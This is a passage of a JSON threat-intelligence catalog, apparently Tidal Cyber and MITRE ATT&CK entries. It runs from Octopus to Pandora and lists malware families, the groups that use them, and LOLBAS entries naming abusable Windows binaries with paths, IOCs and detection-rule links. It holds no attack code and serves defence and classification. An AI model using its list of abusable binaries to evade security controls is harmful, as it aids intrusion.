is a Windows Trojan written in the Delphi programming language that has been used by [Nomadic Octopus](https://app.tidalcyber.com/groups/5f8c6ee0-f302-403b-b712-f1e3df064c0c) to target government organizations in Central Asia since at least 2014.[[Securelist Octopus Oct 2018](https://app.tidalcyber.com/references/77407057-53f1-4fde-bc74-00f73d417f7d)][[Security Affairs DustSquad Oct 2018](https://app.tidalcyber.com/references/0e6b019c-cf8e-40a7-9e7c-6a7dc5309dc6)][[ESET Nomadic Octopus 2018](https://app.tidalcyber.com/references/50dcb3f0-1461-453a-aab9-38c2e259173f)] ", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0340", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "5f8c6ee0-f302-403b-b712-f1e3df064c0c", + "type": "used-by" + }, + { + "dest-uuid": "e2031fd5-02c2-43d4-85e2-b64f474530c2", + "type": "similar" + } + ], + "uuid": "8f04e609-8773-4529-b247-d32f530cc453", + "value": "Octopus" + }, + { + "description": "[[LOLBAS Odbcconf](/references/febcaaec-b535-4347-a4c7-b3284b251897)]", + "meta": { + "id": "32c878f9-f44c-48e6-bf26-b2da2a287c76", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "5e434819-7f4a-440c-a9bd-7675c0218be1", + "type": "similar" + } + ], + "uuid": "b227bbff-8291-4e0d-950d-93785e4058ee", + "value": "Odbcconf.exe" + }, + { + "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Used in Windows for managing ODBC connections\n\n**Author:** Oddvar Moe\n\n**Paths:**\n* C:\\Windows\\System32\\odbcconf.exe\n* C:\\Windows\\SysWOW64\\odbcconf.exe\n\n**Resources:**\n* [https://gist.github.com/NickTyrer/6ef02ce3fd623483137b45f65017352b](https://gist.github.com/NickTyrer/6ef02ce3fd623483137b45f65017352b)\n* [https://github.com/woanware/application-restriction-bypasses](https://github.com/woanware/application-restriction-bypasses)\n* [https://www.hexacorn.com/blog/2020/08/23/odbcconf-lolbin-trifecta/](https://www.hexacorn.com/blog/2020/08/23/odbcconf-lolbin-trifecta/)\n\n**Detection:**\n* Sigma: [proc_creation_win_odbcconf_response_file.yml](https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_odbcconf_response_file.yml)\n* Sigma: [proc_creation_win_odbcconf_response_file_susp.yml](https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_odbcconf_response_file_susp.yml)\n* Elastic: [defense_evasion_unusual_process_network_connection.toml](https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml)\n* Elastic: [defense_evasion_network_connection_from_windows_binary.toml](https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml)[[LOLBAS Odbcconf](/references/febcaaec-b535-4347-a4c7-b3284b251897)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5134", + "source": "Tidal Cyber", + "tags": [ + "64825d12-3cd6-4446-a93c-ff7d8ec13dc8", + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "58db02e6-d908-47c2-bc82-ed58ada61331", + "type": "used-by" + }, + { + "dest-uuid": "b227bbff-8291-4e0d-950d-93785e4058ee", + "type": "similar" + } + ], + "uuid": "5e434819-7f4a-440c-a9bd-7675c0218be1", + "value": "Odbcconf" + }, + { + "description": "[[OfflineScannerShell.exe - LOLBAS Project](/references/8194442f-4f86-438e-bd0c-f4cbda0264b8)]", + "meta": { + "id": "ea846251-ed63-43b6-a37b-871179b84bce", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "8bc7c62a-110d-451b-9ca6-bc48a13e72d4", + "type": "similar" + } + ], + "uuid": "bc428876-7d48-4a33-a080-77916fc66ebc", + "value": "OfflineScannerShell.exe" + }, + { + "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Windows Defender Offline Shell\n\n**Author:** Elliot Killick\n\n**Paths:**\n* C:\\Program Files\\Windows Defender\\Offline\\OfflineScannerShell.exe\n\n**Resources:**\nNone Provided\n\n**Detection:**\n* Sigma: [proc_creation_win_lolbas_offlinescannershell.yml](https://github.com/SigmaHQ/sigma/blob/bea6f18d350d9c9fdc067f93dde0e9b11cc22dc2/rules/windows/process_creation/proc_creation_win_lolbas_offlinescannershell.yml)\n* IOC: OfflineScannerShell.exe should not be run on a normal workstation[[OfflineScannerShell.exe - LOLBAS Project](/references/8194442f-4f86-438e-bd0c-f4cbda0264b8)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5135", + "source": "Tidal Cyber", + "tags": [ + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "bc428876-7d48-4a33-a080-77916fc66ebc", + "type": "similar" + } + ], + "uuid": "8bc7c62a-110d-451b-9ca6-bc48a13e72d4", + "value": "OfflineScannerShell" + }, + { + "description": "[Okrum](https://app.tidalcyber.com/software/f9bcf0a1-f287-44ec-8f53-6859d41e041c) is a Windows backdoor that has been seen in use since December 2016 with strong links to [Ke3chang](https://app.tidalcyber.com/groups/26c0925f-1a3c-4df6-b27a-62b9731299b8).[[ESET Okrum July 2019](https://app.tidalcyber.com/references/197163a8-1a38-4edd-ba73-f44e7a329f41)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0439", + "source": "MITRE", + "tags": [ + "8bf128ad-288b-41bc-904f-093f4fdde745" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "26c0925f-1a3c-4df6-b27a-62b9731299b8", + "type": "used-by" + }, + { + "dest-uuid": "4b6ec280-7bbb-48ff-ae59-b189520ebe83", + "type": "similar" + } + ], + "uuid": "f9bcf0a1-f287-44ec-8f53-6859d41e041c", + "value": "Okrum" + }, + { + "description": "", + "meta": { + "id": "ec4beff7-13ea-4090-bf36-c8724774e223" + }, + "related": [ + { + "dest-uuid": "479814e2-2656-4ea2-9e79-fcdb818f703e", + "type": "similar" + } + ], + "uuid": "b710376a-55b9-44c5-8200-c43d2753e16a", + "value": "Sasfis" + }, + { + "description": "[OLDBAIT](https://app.tidalcyber.com/software/479814e2-2656-4ea2-9e79-fcdb818f703e) is a credential harvester used by [APT28](https://app.tidalcyber.com/groups/5b1a5b9e-4722-41fc-a15d-196a549e3ac5). [[FireEye APT28](https://app.tidalcyber.com/references/c423b2b2-25a3-4a8d-b89a-83ab07c0cd20)] [[FireEye APT28 January 2017](https://app.tidalcyber.com/references/61d80b8f-5bdb-41e6-b59a-d2d996392873)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0138", + "source": "MITRE", + "tags": [ + "4d767e87-4cf6-438a-927a-43d2d0beaab7" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "5b1a5b9e-4722-41fc-a15d-196a549e3ac5", + "type": "used-by" + }, + { + "dest-uuid": "2dd34b01-6110-4aac-835d-b5e7b936b0be", + "type": "similar" + }, + { + "dest-uuid": "b710376a-55b9-44c5-8200-c43d2753e16a", + "type": "similar" + } + ], + "uuid": "479814e2-2656-4ea2-9e79-fcdb818f703e", + "value": "OLDBAIT" + }, + { + "description": "[Olympic Destroyer](https://app.tidalcyber.com/software/073b5288-11d6-4db0-9f2c-a1816847d15c) is malware that was used by [Sandworm Team](https://app.tidalcyber.com/groups/16a65ee9-cd60-4f04-ba34-f2f45fcfc666) against the 2018 Winter Olympics, held in Pyeongchang, South Korea. The main purpose of the malware was to render infected computer systems inoperable. The malware leverages various native Windows utilities and API calls to carry out its destructive tasks. [Olympic Destroyer](https://app.tidalcyber.com/software/073b5288-11d6-4db0-9f2c-a1816847d15c) has worm-like features to spread itself across a computer network in order to maximize its destructive impact.[[Talos Olympic Destroyer 2018](https://app.tidalcyber.com/references/25a2e179-7abd-4091-8af4-e9d2bf24ef11)][[US District Court Indictment GRU Unit 74455 October 2020](https://app.tidalcyber.com/references/77788d05-30ff-4308-82e6-d123a3c2fd80)] ", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0365", + "source": "MITRE", + "tags": [ + "e809d252-12cc-494d-94f5-954c49eb87ce" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "16a65ee9-cd60-4f04-ba34-f2f45fcfc666", + "type": "used-by" + }, + { + "dest-uuid": "3249e92a-870b-426d-8790-ba311c1abfb4", + "type": "similar" + } + ], + "uuid": "073b5288-11d6-4db0-9f2c-a1816847d15c", + "value": "Olympic Destroyer" + }, + { + "description": "[[OneDriveStandaloneUpdater.exe - LOLBAS Project](/references/3d7dcd68-a7b2-438c-95bb-b7523a39c6f7)]", + "meta": { + "id": "8833926e-499b-4d7a-a0b5-cbe512a958df", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "49ef42bc-0958-4b61-9593-a4af69432410", + "type": "similar" + } + ], + "uuid": "b893fa8c-a561-4e33-b1f5-fb2b176530df", + "value": "OneDriveStandaloneUpdater.exe" + }, + { + "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** OneDrive Standalone Updater\n\n**Author:** Elliot Killick\n\n**Paths:**\n* %localappdata%\\Microsoft\\OneDrive\\OneDriveStandaloneUpdater.exe\n\n**Resources:**\n* [https://github.com/LOLBAS-Project/LOLBAS/pull/153](https://github.com/LOLBAS-Project/LOLBAS/pull/153)\n\n**Detection:**\n* IOC: HKCU\\Software\\Microsoft\\OneDrive\\UpdateOfficeConfig\\UpdateRingSettingURLFromOC being set to a suspicious non-Microsoft controlled URL\n* IOC: Reports of downloading from suspicious URLs in %localappdata%\\OneDrive\\setup\\logs\\StandaloneUpdate_*.log files\n* Sigma: [registry_set_lolbin_onedrivestandaloneupdater.yml](https://github.com/SigmaHQ/sigma/blob/ff5102832031425f6eed011dd3a2e62653008c94/rules/windows/registry/registry_set/registry_set_lolbin_onedrivestandaloneupdater.yml)[[OneDriveStandaloneUpdater.exe - LOLBAS Project](/references/3d7dcd68-a7b2-438c-95bb-b7523a39c6f7)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5136", + "source": "Tidal Cyber", + "tags": [ + "b6116080-8fbf-4e9f-9206-20b025f2cf23", + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "b893fa8c-a561-4e33-b1f5-fb2b176530df", + "type": "similar" + } + ], + "uuid": "49ef42bc-0958-4b61-9593-a4af69432410", + "value": "OneDriveStandaloneUpdater" + }, + { + "description": "[OnionDuke](https://app.tidalcyber.com/software/6056bf36-fb45-498d-a285-5f98ae08b090) is malware that was used by [APT29](https://app.tidalcyber.com/groups/4c3e48b9-4426-4271-a7af-c3dfad79f447) from 2013 to 2015. [[F-Secure The Dukes](https://app.tidalcyber.com/references/cc0dc623-ceb5-4ac6-bfbb-4f8514d45a27)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0052", + "source": "MITRE", + "tags": [ + "84615fe0-c2a5-4e07-8957-78ebc29b4635" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "4c3e48b9-4426-4271-a7af-c3dfad79f447", + "type": "used-by" + }, + { + "dest-uuid": "b136d088-a829-432c-ac26-5529c26d4c7e", + "type": "similar" + } + ], + "uuid": "6056bf36-fb45-498d-a285-5f98ae08b090", + "value": "OnionDuke" + }, + { + "description": "[OopsIE](https://app.tidalcyber.com/software/4f1894d4-d085-4348-af50-dfda257a9e18) is a Trojan used by [OilRig](https://app.tidalcyber.com/groups/d01abdb1-0378-4654-aa38-1a4a292703e2) to remotely execute commands as well as upload/download files to/from victims. [[Unit 42 OopsIE! Feb 2018](https://app.tidalcyber.com/references/d4c2bac0-e95c-46af-ae52-c93de3d92f19)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0264", + "source": "MITRE", + "tags": [ + "8bf128ad-288b-41bc-904f-093f4fdde745" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "d01abdb1-0378-4654-aa38-1a4a292703e2", + "type": "used-by" + }, + { + "dest-uuid": "8e101fdd-9f7f-4916-bb04-6bd9e94c129c", + "type": "similar" + } + ], + "uuid": "4f1894d4-d085-4348-af50-dfda257a9e18", + "value": "OopsIE" + }, + { + "description": "[[OpenConsole.exe - LOLBAS Project](/references/e597522a-68ac-4d7e-80c4-db1c66d2da04)]", + "meta": { + "id": "aac485ed-3b0e-4981-b734-3d4f35bd3117", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "54030309-671d-4e4b-b9c0-619cd07f5e05", + "type": "similar" + } + ], + "uuid": "a3c7988f-9ac2-4f7a-ab9d-eb91e905e7a0", + "value": "OpenConsole.exe" + }, + { + "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Console Window host for Windows Terminal\n\n**Author:** Nasreddine Bencherchali\n\n**Paths:**\n* C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\Common7\\IDE\\CommonExtensions\\Microsoft\\Terminal\\ServiceHub\\os64\\OpenConsole.exe\n* C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\Common7\\IDE\\CommonExtensions\\Microsoft\\Terminal\\ServiceHub\\os86\\OpenConsole.exe\n* C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\Common7\\IDE\\CommonExtensions\\Microsoft\\Terminal\\ServiceHub\\os64\\OpenConsole.exe\n\n**Resources:**\n* [https://twitter.com/nas_bench/status/1537563834478645252](https://twitter.com/nas_bench/status/1537563834478645252)\n\n**Detection:**\n* IOC: OpenConsole.exe spawning unexpected processes\n* Sigma: [proc_creation_win_lolbin_openconsole.yml](https://github.com/SigmaHQ/sigma/blob/9e0ef7251b075f15e7abafbbec16d3230c5fa477/rules/windows/process_creation/proc_creation_win_lolbin_openconsole.yml)[[OpenConsole.exe - LOLBAS Project](/references/e597522a-68ac-4d7e-80c4-db1c66d2da04)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5230", + "source": "Tidal Cyber", + "tags": [ + "1dd2d703-fed1-41d2-9843-7b276ef3d6f2", + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "a3c7988f-9ac2-4f7a-ab9d-eb91e905e7a0", + "type": "similar" + } + ], + "uuid": "54030309-671d-4e4b-b9c0-619cd07f5e05", + "value": "OpenConsole" + }, + { + "description": "[[FireEye Periscope March 2018](https://app.tidalcyber.com/references/8edb5d2b-b5c4-4d9d-8049-43dd6ca9ab7f)]", + "meta": { + "id": "c12c69fa-49ac-402f-b67c-2d9581a6d873" + }, + "related": [ + { + "dest-uuid": "45a52a29-00c0-458a-b705-1040e06a43f2", + "type": "similar" + } + ], + "uuid": "aa558e34-f3ca-443e-b067-a6a88ee46cf6", + "value": "AIRBREAK" + }, + { + "description": "[Orz](https://app.tidalcyber.com/software/45a52a29-00c0-458a-b705-1040e06a43f2) is a custom JavaScript backdoor used by [Leviathan](https://app.tidalcyber.com/groups/eadd78e3-3b5d-430a-b994-4360b172c871). It was observed being used in 2014 as well as in August 2017 when it was dropped by Microsoft Publisher files. [[Proofpoint Leviathan Oct 2017](https://app.tidalcyber.com/references/f8c2b67b-c097-4b48-8d95-266a45b7dd4d)] [[FireEye Periscope March 2018](https://app.tidalcyber.com/references/8edb5d2b-b5c4-4d9d-8049-43dd6ca9ab7f)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0229", + "source": "MITRE", + "tags": [ + "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "eadd78e3-3b5d-430a-b994-4360b172c871", + "type": "used-by" + }, + { + "dest-uuid": "06d735e7-1db1-4dbe-ab4b-acbe419f902b", + "type": "similar" + }, + { + "dest-uuid": "aa558e34-f3ca-443e-b067-a6a88ee46cf6", + "type": "similar" + } + ], + "uuid": "45a52a29-00c0-458a-b705-1040e06a43f2", + "value": "Orz" + }, + { + "description": "[OSInfo](https://app.tidalcyber.com/software/fa1e13b8-2fb7-42e8-b630-25f0edfbca65) is a custom tool used by [APT3](https://app.tidalcyber.com/groups/9da726e6-af02-49b8-8ebe-7ea4235513c9) to do internal discovery on a victim's computer and network. [[Symantec Buckeye](https://app.tidalcyber.com/references/dbf3ce3e-bcf2-4e47-ad42-839e51967395)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0165", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "9da726e6-af02-49b8-8ebe-7ea4235513c9", + "type": "used-by" + }, + { + "dest-uuid": "f6d1d2cb-12f5-4221-9636-44606ea1f3f8", + "type": "similar" + } + ], + "uuid": "fa1e13b8-2fb7-42e8-b630-25f0edfbca65", + "value": "OSInfo" + }, + { + "description": "[[Trend Micro MacOS Backdoor November 2020](https://app.tidalcyber.com/references/43726cb8-a169-4594-9323-fad65b9bae97)]", + "meta": { + "id": "de23bf36-160a-42cc-9971-eb157ca839a2" + }, + "related": [ + { + "dest-uuid": "a45904b5-0ada-4567-be4c-947146c7f574", + "type": "similar" + } + ], + "uuid": "f89703da-6631-4e60-be1c-0ecbe5a6f738", + "value": "Backdoor.MacOS.OCEANLOTUS.F" + }, + { + "description": "[OSX_OCEANLOTUS.D](https://app.tidalcyber.com/software/a45904b5-0ada-4567-be4c-947146c7f574) is a macOS backdoor used by [APT32](https://app.tidalcyber.com/groups/c0fe9859-e8de-4ce1-bc3c-b489e914a145). First discovered in 2015, [APT32](https://app.tidalcyber.com/groups/c0fe9859-e8de-4ce1-bc3c-b489e914a145) has continued to make improvements using a plugin architecture to extend capabilities, specifically using `.dylib` files. [OSX_OCEANLOTUS.D](https://app.tidalcyber.com/software/a45904b5-0ada-4567-be4c-947146c7f574) can also determine it's permission level and execute according to access type (`root` or `user`).[[Unit42 OceanLotus 2017](https://app.tidalcyber.com/references/fcaf57f1-6696-54a5-a78c-255c8f6ac235)][[TrendMicro MacOS April 2018](https://app.tidalcyber.com/references/e18ad1a7-1e7e-4aca-be9b-9ee12b41c147)][[Trend Micro MacOS Backdoor November 2020](https://app.tidalcyber.com/references/43726cb8-a169-4594-9323-fad65b9bae97)]", + "meta": { + "platforms": [ + "macOS" + ], + "software_attack_id": "S0352", + "source": "MITRE", + "tags": [ + "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "c0fe9859-e8de-4ce1-bc3c-b489e914a145", + "type": "used-by" + }, + { + "dest-uuid": "b00f90b6-c75c-4bfd-b813-ca9e6c9ebf29", + "type": "similar" + }, + { + "dest-uuid": "f89703da-6631-4e60-be1c-0ecbe5a6f738", + "type": "similar" + } + ], + "uuid": "a45904b5-0ada-4567-be4c-947146c7f574", + "value": "OSX_OCEANLOTUS.D" + }, + { + "description": "[[sentinelone shlayer to zshlayer](https://app.tidalcyber.com/references/17277b12-af29-475a-bc9a-0731bbe0bae2)]", + "meta": { + "id": "1dffb83e-06ed-4ee8-8084-f972c8bdf5f6" + }, + "related": [ + { + "dest-uuid": "4d91d625-21d8-484a-b63f-0a3daa4ed434", + "type": "similar" + } + ], + "uuid": "b7c33058-21b0-46df-988c-88dfab53e83a", + "value": "Zshlayer" + }, + { + "description": "[[Intego Shlayer Apr 2018](https://app.tidalcyber.com/references/3ca1254c-db51-4a5d-8242-ffd9e4481c22)][[Malwarebytes Crossrider Apr 2018](https://app.tidalcyber.com/references/80530288-26a3-4c3e-ace1-47510df10fbd)]", + "meta": { + "id": "f8142c74-2903-484a-a367-d8d93f678e00" + }, + "related": [ + { + "dest-uuid": "4d91d625-21d8-484a-b63f-0a3daa4ed434", + "type": "similar" + } + ], + "uuid": "1420094e-351e-4294-b59b-52d2da2724b8", + "value": "Crossrider" + }, + { + "description": "[OSX/Shlayer](https://app.tidalcyber.com/software/4d91d625-21d8-484a-b63f-0a3daa4ed434) is a Trojan designed to install adware on macOS that was first discovered in 2018.[[Carbon Black Shlayer Feb 2019](https://app.tidalcyber.com/references/d8212691-4a6e-49bf-bc33-740850a1189a)][[Intego Shlayer Feb 2018](https://app.tidalcyber.com/references/46eb883c-e203-4cd9-8f1c-c6ea12bc2742)]", + "meta": { + "platforms": [ + "macOS" + ], + "software_attack_id": "S0402", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "f1314e75-ada8-49f4-b281-b1fb8b48f2a7", + "type": "similar" + }, + { + "dest-uuid": "b7c33058-21b0-46df-988c-88dfab53e83a", + "type": "similar" + }, + { + "dest-uuid": "1420094e-351e-4294-b59b-52d2da2724b8", + "type": "similar" + } + ], + "uuid": "4d91d625-21d8-484a-b63f-0a3daa4ed434", + "value": "OSX/Shlayer" + }, + { + "description": "[Out1](https://app.tidalcyber.com/software/273b1e8d-a23d-4c22-8493-80f3d6639352) is a remote access tool written in python and used by [MuddyWater](https://app.tidalcyber.com/groups/dcb260d8-9d53-404f-9ff5-dbee2c6effe6) since at least 2021.[[Trend Micro Muddy Water March 2021](https://app.tidalcyber.com/references/16b4b834-2f44-4bac-b810-f92080c41f09)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0594", + "source": "MITRE", + "tags": [], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "dcb260d8-9d53-404f-9ff5-dbee2c6effe6", + "type": "used-by" + }, + { + "dest-uuid": "80c815bb-b24a-4b9c-9d73-ff4c075a278d", + "type": "similar" + } + ], + "uuid": "273b1e8d-a23d-4c22-8493-80f3d6639352", + "value": "Out1" + }, + { + "description": "[OutSteel](https://app.tidalcyber.com/software/042fe42b-f60e-45e1-b47d-a913e0677976) is a file uploader and document stealer developed with the scripting language AutoIT that has been used by [Ember Bear](https://app.tidalcyber.com/groups/407274be-1820-4a84-939e-629313f4de1d) since at least March 2021.[[Palo Alto Unit 42 OutSteel SaintBot February 2022 ](https://app.tidalcyber.com/references/b0632490-76be-4018-982d-4b73b3d13881)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S1017", + "source": "MITRE", + "tags": [ + "8bf128ad-288b-41bc-904f-093f4fdde745", + "4d767e87-4cf6-438a-927a-43d2d0beaab7" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "407274be-1820-4a84-939e-629313f4de1d", + "type": "used-by" + }, + { + "dest-uuid": "c113230f-f044-423b-af63-9b63c802f5ae", + "type": "similar" + } + ], + "uuid": "042fe42b-f60e-45e1-b47d-a913e0677976", + "value": "OutSteel" + }, + { + "description": "[OwaAuth](https://app.tidalcyber.com/software/6d8a8510-e6f1-49a7-b3a5-bd4664937147) is a Web shell and credential stealer deployed to Microsoft Exchange servers that appears to be exclusively used by [Threat Group-3390](https://app.tidalcyber.com/groups/79be2f31-5626-425e-844c-fd9c99e38fe5). [[Dell TG-3390](https://app.tidalcyber.com/references/dfd2d832-a6c5-40e7-a554-5a92f05bebae)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0072", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "a60657fa-e2e7-4f8f-8128-a882534ae8c5", + "type": "similar" + } + ], + "uuid": "6d8a8510-e6f1-49a7-b3a5-bd4664937147", + "value": "OwaAuth" + }, + { + "description": "", + "meta": { + "id": "0be03191-fd13-4d31-b7b3-128c37e9e774" + }, + "related": [ + { + "dest-uuid": "916f8a7c-e487-4446-b6ee-c8da712a9569", + "type": "similar" + } + ], + "uuid": "a9205e41-8ef6-4b3a-9477-f6b673668d11", + "value": "Peer-to-Peer ZeuS" + }, + { + "description": "", + "meta": { + "id": "f7872aaf-38e2-46a6-af91-805e19096d3b" + }, + "related": [ + { + "dest-uuid": "916f8a7c-e487-4446-b6ee-c8da712a9569", + "type": "similar" + } + ], + "uuid": "af301e1b-5252-41eb-8802-9c5129d40091", + "value": "Gameover ZeuS" + }, + { + "description": "[P2P ZeuS](https://app.tidalcyber.com/software/916f8a7c-e487-4446-b6ee-c8da712a9569) is a closed-source fork of the leaked version of the ZeuS botnet. It presents improvements over the leaked version, including a peer-to-peer architecture. [[Dell P2P ZeuS](https://app.tidalcyber.com/references/773d1d91-a93c-4bb3-928b-4c3f82f2c889)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0016", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "b2c5d3ca-b43a-4888-ad8d-e2d43497bf85", + "type": "similar" + }, + { + "dest-uuid": "a9205e41-8ef6-4b3a-9477-f6b673668d11", + "type": "similar" + }, + { + "dest-uuid": "af301e1b-5252-41eb-8802-9c5129d40091", + "type": "similar" + } + ], + "uuid": "916f8a7c-e487-4446-b6ee-c8da712a9569", + "value": "P2P ZeuS" + }, + { + "description": "[[Securelist APT10 March 2021](https://app.tidalcyber.com/references/90450a1e-59c3-491f-b842-2cf81023fc9e)]", + "meta": { + "id": "f6ef8ff8-913c-470d-b669-a2a1aab38312" + }, + "related": [ + { + "dest-uuid": "1933ad3d-3085-4b1b-82b9-ac51b440e2bf", + "type": "similar" + } + ], + "uuid": "42353f34-77f6-4928-ae59-e3c9518ef1ba", + "value": "HEAVYPOT" + }, + { + "description": "[[Securelist APT10 March 2021](https://app.tidalcyber.com/references/90450a1e-59c3-491f-b842-2cf81023fc9e)]", + "meta": { + "id": "ed0a3867-3af0-4687-aa35-2484bd705527" + }, + "related": [ + { + "dest-uuid": "1933ad3d-3085-4b1b-82b9-ac51b440e2bf", + "type": "similar" + } + ], + "uuid": "d1748d73-27f8-4bf1-a8cf-fcc82cebffbc", + "value": "GreetCake" + }, + { + "description": "[P8RAT](https://app.tidalcyber.com/software/1933ad3d-3085-4b1b-82b9-ac51b440e2bf) is a fileless malware used by [menuPass](https://app.tidalcyber.com/groups/fb93231d-2ae4-45da-9dea-4c372a11f322) to download and execute payloads since at least 2020.[[Securelist APT10 March 2021](https://app.tidalcyber.com/references/90450a1e-59c3-491f-b842-2cf81023fc9e)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0626", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "fb93231d-2ae4-45da-9dea-4c372a11f322", + "type": "used-by" + }, + { + "dest-uuid": "7c58fff0-d206-4db1-96b1-e3a9e0e320b9", + "type": "similar" + }, + { + "dest-uuid": "42353f34-77f6-4928-ae59-e3c9518ef1ba", + "type": "similar" + }, + { + "dest-uuid": "d1748d73-27f8-4bf1-a8cf-fcc82cebffbc", + "type": "similar" + } + ], + "uuid": "1933ad3d-3085-4b1b-82b9-ac51b440e2bf", + "value": "P8RAT" + }, + { + "description": "Pacu is an open-source AWS exploitation framework. The tool is written in Python and publicly available on GitHub.[[GitHub Pacu](https://app.tidalcyber.com/references/bda43b1b-ea8d-4371-9984-6d8a7cc24965)]", + "meta": { + "platforms": [ + "IaaS" + ], + "software_attack_id": "S1091", + "source": "MITRE", + "tags": [ + "a2e000da-8181-4327-bacd-32013dbd3654", + "2e5f6e4a-4579-46f7-9997-6923180815dd", + "ed2b3f47-3e07-4019-a9bf-ec9d87f28c96" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "3d77fb6c-cfb4-5563-b0be-7aa1ad535337", + "type": "used-by" + }, + { + "dest-uuid": "1b3b8f96-43b1-4460-8e02-1f53d7802fb9", + "type": "similar" + } + ], + "uuid": "e90eb529-1665-5fd7-a44e-695715e4081b", + "value": "Pacu" + }, + { + "description": "[Pandora](https://app.tidalcyber.com/software/320b0784-4f0f-46ea-99e9-c34bfcca1c2e) is a multistage kernel rootkit with backdoor functionality that has been in use by [Threat Group-3390](https://app.tidalcyber.com/groups/79be2f31-5626-425e-844c-fd9c99e38fe5) since at least 2020.[[Trend Micro Iron Tiger April 2021](https://app.tidalcyber.com/references/d0890d4f-e7ca-4280-a54e-d147f6dd72aa)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0664", + "source": "MITRE", + "tags": [ + "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" + ], + "type": "malware" + }, + "related": [ + { + 